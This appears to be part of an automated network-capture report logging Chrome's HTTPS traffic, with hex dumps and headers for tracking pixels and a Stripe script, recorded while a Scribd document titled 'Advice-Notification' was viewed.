                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 42 f5 8f b8 b5 8d b7 e1 0a 48 e7 40 ca 4a 94 28 d0 35 d6 3e 97 0b a5 7d 68 0d d0 13 c6 b4 44 fb 8d 3a 08 c9 40 18 10 a0 bc 17 15 e0 99 6a e5 e8 5a 21 e0 a3 8e 84 55 28 e3 38 78 0f 20 64 9a 9f c5 76 b0 1d 7c 6d 87 4f 35 58 17 a6 b3 fd 7a 3b 5c e9 b9 36 da 76 06 83 ed 76 bf 5e 67 8a 36 dd 16 c5 1a 2e 7c ad bf ba ea 6a b8 1e c0 d7 7a bd fe 5a 30 b6 58 e3 95 af ed a8 4b d5 c7 f6 03 bc ba de ae b7 f3 b2 fe 04 3f f4 e0 75 56 45 31 78 a2 f5 af ee 8f 1f 1f e3 af 2a ed e1 6c bd 2e f0 41 83 ed 13 4c 3d e6 17 be c1 5b e1 29 55 a0 be 2a 6c cb 71 3b 35 1d bb 9a 6d 05 03 58 f8 03 d0 79 3c 81 2f 2e fc 5c 79 85 0f 52 1d e0 4f 6c c4 89 e5 a3 2c 3b d0 18 ea d7 f8 b9 e4 9d aa 8c bd ad 84 54 27 e0 ea 6f 8d 01 c1 2d 8d 61 86 32 38 34 fb b8 1c 23 37 44 9d a1 94 8c 50 87 a2 5c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: BH@J(5>}hD:@jZ!U(8x dv|mO5Xz;\6vv^g6.|jzZ0XK?uVE1x*l.AL=[)U*lq;5mXy</.\yROl,;T'o-a284#7DP\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 8e 91 33 b3 7e df dd df 7d e5 46 3b b3 77 cd f4 f7 af d7 d3 1e b1 e7 ad 78 69 84 25 d3 77 f8 10 d5 95 ae 95 3c ba 4d b8 d8 f9 91 6b 4a df 36 79 b6 13 66 c9 ac f3 97 2b 7d ca e1 d8 80 51 b5 2e d1 b4 69 ab 75 bf b9 59 fe 7a 7d 7d 26 4e 01 1d 10 ea 4a 66 b8 d7 d0 e0 82 1f 8a 32 86 f5 f7 73 0d aa 3d 0d 87 c0 69 7d 21 f8 51 a5 d0 5b 45 39 9a 8e ed 57 55 09 e1 b3 58 78 e2 0f 66 36 b1 c5 76 1e fa 7d 73 f8 10 da 7c 84 7b a3 e7 01 7d 2d 64 24 a8 cd fa d0 10 b2 7d 00 27 6b c0 5f 3e 55 18 55 02 a3 6a 4d ef ef 5e a0 3d 19 3e 14 c8 89 00 2d b5 19 55 26 07 d0 f6 1a 00 e3 98 41 5f 1e db 41 29 55 f3 9e b0 9c 70 0d 13 ec 8b 19 1f 13 c0 53 ca 30 2a 8b ec 51 34 1c d9 5e 44 2e 9c 0c d2 fc 53 0b cb 8b e2 c9 38 10 f1 18 01 dc c2 71 36 e6 80 20 19 dc ba bb 98 85 59 2f b2 5c ef
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3~}F;wxi%w<MkJ6yf+}Q.iuYz}}&NJf2s=i}!Q[E9WUXxf6v}s|{}-d$}'k_>UUjM^=>-U&A_A)UpS0*Q4^D.S8q6 Y/\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 96 5a 8e b7 36 e5 53 73 69 e7 ff e7 d7 f3 f1 78 ce a6 7b 7d d7 7c d4 60 36 2d 3a 9c e8 be 38 76 11 fd 36 9a a6 8a 8b 86 a1 99 ed d3 d3 f1 01 e2 0d 1f 8d 85 e2 51 4d d3 82 04 4a fd e9 2f 76 7d b5 fe c8 85 9a 8d 4b 39 96 23 5d 15 59 d3 cf d4 2c 7d 3e ed 5a 80 05 17 55 07 59 ab 7f c0 e2 b0 96 14 a8 e2 29 bd 7e 9d 23 b7 d3 d9 39 57 30 ec 9a 5b 1e b4 6e 50 d4 d3 d1 52 8d de e1 52 3e c5 1c 8a 0f c4 fb a3 23 9a 69 18 3b 23 8f 1f 45 b4 b5 17 6e 3d ff dd d3 87 3f ee dd ae e8 33 ed 33 5a 40 33 74 43 d7 e0 77 86 f1 e8 fe d3 a7 7f 3f 7a f4 e8 39 99 e3 79 de 4e a8 5c d6 ae a5 55 83 e7 4c 55 6b cc d5 bf 52 ac 2d 74 39 fe b7 73 81 8c 27 7d c3 86 14 bc e5 b4 63 44 04 76 d2 0f 17 8a 7a 9a c2 b7 c3 d7 af 55 fb c8 74 3e fa 55 8f d6 1e 68 87 5f e9 b3 13 3f be fe ee 21 8f 27
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Z6Ssix{}|`6-:8v6QMJ/v}K9#]Y,}>ZUY)~#9W0[nPRR>#i;#En=?33Z@3tCw?z9yN\ULUkR-t9s'}cDvzUt>Uh_?!'
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 9f 7c f3 6e 45 45 c5 e6 23 97 fa 47 fa cf ef 3e 21 8a 82 9c 0d 72 05 89 5e 2c 31 c2 dc 02 0b 91 90 4a 19 29 9b bc 49 cc fe 4d b6 28 23 06 a1 c9 f4 8f c5 03 4b f8 54 00 1e 04 aa d4 b3 5b 8f 41 4e 07 9d 0b 16 d9 44 2a ce 2d db 59 2d 8b 48 26 4f 05 70 bc 48 b2 ed 4f 38 93 2c ed 7b 65 2f 2b ae a8 00 9d ac 94 0d 33 83 29 91 6e c1 bb e9 0b 32 23 64 d8 dd 0c 61 e4 bc 22 0c 05 82 58 52 90 04 4c e0 82 40 81 5d 08 5c b2 dc 9d 46 0e d0 06 13 e2 24 45 2f 4b 4f 27 49 ff a5 c1 8a 79 13 57 ba e8 f3 78 8a d1 98 99 c6 82 6e 5e 17 c9 2e 4c 43 13 8a c8 b1 ad 48 16 15 a9 00 51 b0 68 97 95 b6 24 85 95 62 a5 d0 b0 52 14 b4 82 48 b4 14 3c b6 43 08 89 86 12 21 91 af a7 a5 cb 3f f8 fe c1 77 ee f0 3e 94 0d 59 07 db d7 f7 9c 7b ce b9 01 87 e8 19 e9 cb 32 d2 7e 50 73 f7 5f f1 e2 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |nEE#G>!r^,1J)IM(#KT[AND*-Y-H&OpHO8,{e/+3)n2#da"XRL@]\F$E/KO'IyWxn^.LCHQh$bRH<C!?w>Y{2~Ps_.


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        111192.168.2.1649852162.159.140.2294436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1067OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: t.co
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: muc_ads=2483231b-cc38-466c-aba5-a253066bdc53; __cf_bm=chNrjQ8Lch28S5lOa3Si64I9cftb.x6ifHyJn0JddKQ-1733522378-1.0.1.1-oGj2RIBts1knJnzL5Xn6qILftQDpAz.5kkPSQytfx7H07LNbgaUBPATZrDPgtwu2UeKOzEpUcVJkwu9i0_rGOg
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC459INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        perf: 7402827104
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        x-transaction-id: 1a119855b02554b6
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        x-response-time: 5
                                                                                                                                                                                                                                                                                                                                                                                        x-connection-hash: 663a2d8c3deff8afa6ab961c2f0511e91ef5695b1b277434bbff8e05452aab09
                                                                                                                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare tsa_b
                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8edf8b5d1aef72b1-EWR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        112192.168.2.164985352.222.144.584436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC540OUTGET /out-4.5.44.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: m.stripe.network
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://m.stripe.network/inner.html
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 88793
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 05 Dec 2024 23:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=300, public
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "fd35981a337052cd3ccd82dc674ff76d"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 1976c726f5a49e79daf18d11f7fa62da.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-C2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: YKXoU4H9HVkvZZkwqMYW4_YWTnTvPZgpTZFTSNb9kT5JFAlQQ9mcRA==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC16384INData Raw: 76 61 72 20 53 74 72 69 70 65 4d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 5f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 5f 2e 65 78 70 6f 72 74 73 2c 5f 2c 5f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 5f 2e 6c 3d 21 30 2c 5f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC15596INData Raw: 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 68 28 65 29 7d 28 65 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 6e 75 6c 6c 21 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 6e 75 6c 6c 21 3d 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 28 65 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 68 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (e){return function(e){if(Array.isArray(e))return h(e)}(e)||function(e){if("undefined"!=typeof Symbol&&null!=e[Symbol.iterator]||null!=e["@@iterator"])return Array.from(e)}(e)||function(e,t){if(!e)return;if("string"==typeof e)return h(e,t);var n=Object.pr
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC16384INData Raw: 65 3a 21 30 7d 29 7d 65 28 22 5f 5f 67 65 74 5f 5f 22 2c 68 29 2c 65 28 22 5f 5f 47 65 74 44 65 70 65 6e 64 65 6e 63 79 5f 5f 22 2c 68 29 2c 65 28 22 5f 5f 52 65 77 69 72 65 5f 5f 22 2c 76 29 2c 65 28 22 5f 5f 73 65 74 5f 5f 22 2c 76 29 2c 65 28 22 5f 5f 72 65 73 65 74 5f 5f 22 2c 64 29 2c 65 28 22 5f 5f 52 65 73 65 74 44 65 70 65 6e 64 65 6e 63 79 5f 5f 22 2c 64 29 2c 65 28 22 5f 5f 77 69 74 68 5f 5f 22 2c 62 29 7d 28 29 7d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 28 33 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 64 28 74 2c 22 62 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 29 29 2c 6e 2e 64 28 74 2c 22 61 22 2c 28 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e:!0})}e("__get__",h),e("__GetDependency__",h),e("__Rewire__",v),e("__set__",v),e("__reset__",d),e("__ResetDependency__",d),e("__with__",b)}()}).call(this,n(3))},function(e,t,n){"use strict";(function(e){n.d(t,"b",(function(){return E})),n.d(t,"a",(functi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC15807INData Raw: 76 61 72 20 61 2c 66 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 66 29 7b 76 61 72 20 65 3d 75 28 29 3b 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 4e 45 58 54 5f 4d 4f 44 55 4c 45 5f 49 44 5f 5f 7c 7c 28 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 4e 45 58 54 5f 4d 4f 44 55 4c 45 5f 49 44 5f 5f 3d 30 29 2c 66 3d 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 4e 45 58 54 5f 4d 4f 44 55 4c 45 5f 49 44 5f 5f 2b 2b 7d 72 65 74 75 72 6e 20 66 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 76 61 72 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 7c 7c 28 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var a,f=null;function s(){if(null===f){var e=u();e.__$$GLOBAL_REWIRE_NEXT_MODULE_ID__||(e.__$$GLOBAL_REWIRE_NEXT_MODULE_ID__=0),f=__$$GLOBAL_REWIRE_NEXT_MODULE_ID__++}return f}function l(){var e=u();return e.__$$GLOBAL_REWIRE_REGISTRY__||(e.__$$GLOBAL_REW
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC16384INData Raw: 45 5f 52 45 47 49 53 54 52 59 5f 5f 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 29 2c 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 65 3d 79 28 29 2c 74 3d 45 28 29 2c 6e 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 74 5b 65 5d 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 6e 3d 74 5b 65 5d 29 2c 6e 7d 28 73 3d 66 28 29 29 2e 5f 5f 72 65 77 69 72 65 5f 72 65 73 65 74 5f 61 6c 6c 5f 5f 7c 7c 28 73 2e 5f 5f 72 65 77 69 72 65 5f 72 65 73 65 74 5f 61 6c 6c 5f 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E_REGISTRY__=Object.create(null)),e.__$$GLOBAL_REWIRE_REGISTRY__}function h(){var e=y(),t=E(),n=t[e];return n||(t[e]=Object.create(null),n=t[e]),n}(s=f()).__rewire_reset_all__||(s.__rewire_reset_all__=function(){s.__$$GLOBAL_REWIRE_REGISTRY__=Object.creat
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC6002INData Raw: 65 29 7b 76 61 72 20 74 3d 79 28 29 3b 64 65 6c 65 74 65 20 74 5b 65 5d 2c 30 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 6c 28 29 5b 73 5d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 76 61 72 20 74 3d 79 28 29 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2c 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 5b 65 5d 3d 72 5b 65 5d 7d 29 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 5b 6e 5d 3d 74 5b 6e 5d 2c 74 5b 6e 5d 3d 65 5b 6e 5d 7d 29 29 3b 76 61 72 20 69 3d 6f 28 29 3b 72 65 74 75 72 6e 20 69 26 26 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e){var t=y();delete t[e],0==Object.keys(t).length&&delete l()[s]}function R(e){var t=y(),n=Object.keys(e),r={};function _(){n.forEach((function(e){t[e]=r[e]}))}return function(o){n.forEach((function(n){r[n]=t[n],t[n]=e[n]}));var i=o();return i&&"function"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC2236INData Raw: 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 22 2b 65 29 29 3b 66 6f 72 28 76 61 72 20 74 3d 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 2b 31 5d 3b 76 61 72 20 5f 3d 7b 63 61 6c 6c 62 61 63 6b 3a 65 2c 61 72 67 73 3a 74 7d 3b 72 65 74 75 72 6e 20 61 5b 75 5d 3d 5f 2c 72 28 75 29 2c 75 2b 2b 7d 2c 6c 2e 63 6c 65 61 72 49 6d 6d 65 64 69 61 74 65 3d 79 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 64 65 6c 65 74 65 20 61 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 69 66 28 66 29 73 65 74 54 69 6d 65 6f 75 74 28 45 2c 30 2c 65 29 3b 65 6c 73 65 7b 76
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: on"!=typeof e&&(e=new Function(""+e));for(var t=new Array(arguments.length-1),n=0;n<t.length;n++)t[n]=arguments[n+1];var _={callback:e,args:t};return a[u]=_,r(u),u++},l.clearImmediate=y}function y(e){delete a[e]}function E(e){if(f)setTimeout(E,0,e);else{v


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        113192.168.2.164985635.186.224.244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC351OUTGET /v1/ingest HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: pixels.spotify.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Via: HTTP/2 edgeproxy, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        114192.168.2.1649854104.244.42.1314436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC929OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: analytics.twitter.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: personalization_id="v1_GaFna+OYzedzGqXlkIr+8A=="
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC401INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        perf: 7402827104
                                                                                                                                                                                                                                                                                                                                                                                        server: tsa_b
                                                                                                                                                                                                                                                                                                                                                                                        content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        content-length: 43
                                                                                                                                                                                                                                                                                                                                                                                        x-transaction-id: 859f9e55e6120725
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=631138519
